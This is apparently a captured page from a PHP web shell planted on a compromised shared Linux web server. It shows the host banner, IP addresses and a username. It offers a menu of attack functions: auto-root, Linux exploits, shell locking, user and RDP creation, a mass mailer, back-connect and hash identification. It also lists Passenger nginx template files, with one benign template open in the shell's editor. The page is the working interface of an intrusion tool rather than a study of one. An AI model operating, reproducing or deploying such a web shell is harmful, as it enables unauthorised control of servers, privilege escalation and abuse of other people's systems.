Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
passenger /
templates /
standalone /
[ HOME SHELL ]
Name
Size
Permission
Action
cannot_write_to_dir.txt.erb
461
B
-rw-r--r--
config.erb
3.08
KB
-rw-r--r--
footer.erb
31
B
-rw-r--r--
global.erb
744
B
-rw-r--r--
http.erb
1.97
KB
-rw-r--r--
mass_deployment_default_server...
383
B
-rw-r--r--
rails_asset_pipeline.erb
542
B
-rw-r--r--
server.erb
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : global.erb
master_process on; daemon on; error_log '<%= @options[:log_file] %>' <% if @options[:log_level] >= LVL_DEBUG %>info<% end %>; pid '<%= @options[:pid_file] %>'; <% if @options[:abort_websockets_on_process_shutdown].nil? || @options[:abort_websockets_on_process_shutdown] %> worker_shutdown_timeout 10; <% end %> <% if Process.euid == 0 %> <% if @options[:user] %> <%# Run workers as the given user. The master process will always run as root and will be able to bind to any port. %> user <%= @options[:user] %> <%= default_group_for(@options[:user]) %>; <% else %> <%# Prevent running Nginx workers as nobody. %> user <%= current_user %> <%= default_group_for(current_user) %>; <% end %> <% end %>
Close